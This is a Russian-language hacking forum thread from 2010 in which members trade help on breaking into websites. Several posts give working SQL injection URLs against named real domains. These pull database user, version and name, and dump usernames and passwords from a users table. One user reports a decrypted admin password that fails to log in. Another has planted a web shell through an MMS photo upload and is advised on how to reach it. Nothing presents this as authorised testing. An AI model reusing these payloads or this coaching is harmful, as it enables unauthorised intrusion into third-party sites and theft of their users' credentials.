Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    есть сайт site.ru/page.php?id=1. Не могу догнать: когда я подставляю id=1 and 1=2 у меня открывается страница, как для id=1. Как это получается?
     
  2. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Значит нету там иньекции просто. Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?
     
    #11382 _iks_, 14 Feb 2010
    Last edited: 14 Feb 2010
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Значит там не из базы берет?? или нету инъекции? а если нет инъекции, то какой запрос тогда получается?
     
  4. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    CyberHunter, это значит что тебе пора читать статьи, а не постить сюда вопросы которые были заданы овер 9000 раз
     
    2 people like this.
  6. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Во так. Я посмотрел сайт, да, там есть иньекция, почитай закреплённые темы

    И кстати либо норм линк кидай, либо удаляй имя сайта из пути

     
    #11386 _iks_, 14 Feb 2010
    Last edited: 14 Feb 2010
  7. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    есть такоы вопрос..

    есть один wаp саыт..у нево есть ммс сервис..и от туда мойно заqрузить фото и я заярузил шелл..

    знаю то4но шелл в базе ну не мояу наыти линк..посмoтру своытсву шелл-а там есть линк друяово саыта..

    4то зделат ??
     
    1 person likes this.
  8. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Code:
    http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7+--
     
    2 people like this.
  10. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Если я тебя правильно понял, то тебе нужно найти папку в которой хранятся изображения (вместо одного из которых ты загрузил шелл).
     
  11. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Для начала неплохо бы найти инклуд, если расширение как у картинки
     
  12. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Ну да, складывал и вычитал, и ордэром проверял. Но дело в том что когда я у себя проверял(ну у меня смотрит строка или число, а если там запрос к приверу id=1 and 1=2, то он отправляет как строку), то у меня тоже открывается та же страница.
    nerezus назвал мой метод "Самый говнокодистый говнокод в этой теме."

    Code:
    function secure($par) {
      $numb = array("1","2","3","4","5","6","7","8","9","0","-");
       if( get_magic_quotes_gpc())
    	   {
               $link = stripslashes($par);
    	   }
       $l=$par+1-1;
       if ((string)$l==(string)$par) {
    	   
         $par=(string)$par;
         $new_par="";
         for ($i=0;$i<>strlen($par);$i++) {
           if (in_array($par{$i},$numb)) {
           $new_par=$new_par.$par{$i};
    	   }
          if ($new_par<"-2147483648" || $new_par>"2147483647") $new_par="1";
    	 $new_par=(int)$new_par;
         }
       }
       else
       {
       $new_par=mysql_real_escape_string($par);
       }
       return $new_par;
    }
    
    по етому разобраться надо
     
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    да да то4но заяруяется ну не знаю куда ..??
     
  15. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi  on(),database()),6,7+--
    wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
    http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?
    З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.
     
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    CyberHunter

    при запросе
    Выводится тек.юзер, версия БД и имя бд.

    а при запросе:
    выводится принтабельное поле, точнее при это запросе ничего не выводится,т.к. не правильно подобраны столбцы. Добавь еще .....5,6,7--

    П.С, вот хорошая статья: http://forum.antichat.ru/thread104591.html
     
    #11396 jecka3000, 14 Feb 2010
    Last edited: 14 Feb 2010
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Почему то же самое?
    http://www.mysql.ru/docs/mysql-man-5.0-en/sql-syntax.html#select
     
  18. Tudesky

    Tudesky New Member

    Joined:
    13 Feb 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16+from+users--

    пароль расшифровали только, когда ввожу его в админку не заходит
     
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    jecka3000 спс!
    Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
    И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Значит пароль не от админки, либо расшифрован неправильно.

    + в URL-кодировке - пробел.
    Не понял...
     
    #11400 mailbrush, 14 Feb 2010
    Last edited: 14 Feb 2010
Thread Status:
Not open for further replies.